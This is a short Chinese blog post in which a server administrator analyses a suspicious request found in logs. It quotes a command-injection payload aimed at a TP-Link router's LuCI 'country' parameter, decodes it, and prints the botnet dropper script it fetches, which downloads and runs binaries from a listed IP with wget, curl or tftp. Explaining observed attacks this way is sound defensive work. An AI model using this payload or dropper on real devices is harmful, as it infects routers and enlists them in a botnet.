1、今天在日常做服务器巡检的时候，发现有异常请求处理，处理请求如下：

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.15.222.150%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)

这个一看就很奇怪，还有服务器IP地址。

2、抓过来分析，进行请求翻译如下：

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf shk; wget http://103.15.222.150/shk; chmod 777 shk; ./shk tplink; rm -rf shk`)

大家看懂了没有，它竟然想让服务器去下载文件，然后执行。

我们抓过来分析下这个请求是啥玩意：

 从这个链接里面抓取内容：http://103.15.222.150/shk

这个文件的代码如下：

binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="103.15.222.150"
binout="telnetdbot"
exec="your device just got infected to a bootnoot"

rm -rf $binout
for arch in $binarys
do
rm -rf $arch
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=`./$binout $1`
if [ "$status" = "$exec" ]; then
	rm -rf $binout
	break
fi
rm -rf $binout
done

但是因为我服务器并不会处理它的请求，所以请求无效。

现在网上有很多这样闲的没事干的人，到处攻击别人，这种的直接拉出来鞭尸了~